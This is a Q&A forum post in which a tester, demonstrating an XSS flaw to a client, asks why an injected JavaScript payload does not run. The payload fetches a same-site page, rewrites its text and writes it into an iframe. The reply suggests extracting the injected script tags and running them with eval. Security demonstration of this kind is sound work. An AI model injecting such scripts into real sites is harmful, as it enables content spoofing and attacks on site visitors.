Injected JavaScript function not executing

Question

As part of an XSS flaw I'm trying to demonstrate to a client, I'm trying to inject some JavaScript that will

1. retrieve a webpage,
2. edit the source of that webpage, and
3. spawn an iframe with the new source.

Here is the code that I have:

<script>

function getSource()

{
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
    {
         if (xmlhttp.readyState==4 && xmlhttp.status==200)
            {
              var content=xmlhttp.responseText;
              content = content.replace(/hey/gi, "howdy");
              var ifrm = document.getElementById('myIframe');
              ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;         
              ifrm.document.open();
              ifrm.document.write(content);
              ifrm.document.close();
             }            
    }
    xmlhttp.open("GET","http://www.site.com/pagetopull.html",true);
    xmlhttp.send();
}

</script>

<button onclick="getSource();">click</button>

<iframe id="myIframe"></iframe>

If I have this code wrapped in html tags and then make it into its own page and hit click, the code executes perfectly and the retrieved page is displayed in the iframe. However, when I inject this code into my test surface, the iframe appears but hitting click does not execute the function and retrieve the desired webpage. I am retrieving a page from the same domain, so it is not violating the same origin policy (as far as I'm aware). Can anyone tell me what I'm doing wrong? Thanks a lot.

Answer 1

That is because by default the contents of SCRIPT tags are ignored. You have to traverse the DOM tree of the resulting HTML data for SCRIPT objects and eval their contents manually.